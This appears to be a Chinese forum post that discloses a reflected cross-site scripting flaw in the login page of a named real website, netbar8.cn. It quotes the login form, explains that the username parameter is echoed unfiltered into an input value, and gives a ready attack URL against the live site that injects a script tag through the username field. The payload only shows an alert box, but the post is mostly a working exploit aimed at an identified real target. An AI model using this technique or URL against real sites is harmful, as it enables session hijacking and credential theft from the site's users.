中国网吧在线
http://www.netbar8.cn
登陆地址代码:
<form name="frm_login" action="
/passport/login.asp" method="post" >
<input type="hidden" name="_chk" value="yes">
<input type="hidden" name="goback" value="yes">
<div>用户名: <input type="text" class="username"
name="username" value="" size="15" maxlength="20"></div>
<div>密 码: <input type="password" class="password"
name="password" value="" size="15" maxlength="20"></div>
<div><a href="/passport/misc.asp?action=pass">忘记密码</a><input type="checkbox" class="normal" id="login_remember_info" name="remember_info" value="yes"><label for="login_remember_info" title="如选择“永久登录”登录,以后将自动登录本站!">永久登录</label></div>
<div><a href="/passport/"><img class="icon" src="/skin/default/images/passport/btn_register.gif"></a> <input type="image" class="image" name="_sbt" src="/skin/default/images/passport/btn_login.gif" ></div>
大家看到了吧,绿色那两句帐号处没有做任何过滤就把帐号提交到
value="" 了.用">闭合前面句子,用<"闭合后面句子.不时就能跨了.
首先,在网址后添加登陆代码中红色那句,在.asp后加个 "?" 问号,加入我们追加的
username="><script>alert('XSS');</script><"&password=123456
(用户名和密码基本是这样一个形式排列的.)
就形成了以下XSS测试地址:
http://www.netbar8.cn/passport/login.asp?username="><script>alert('XSS');</script><"&password=123456
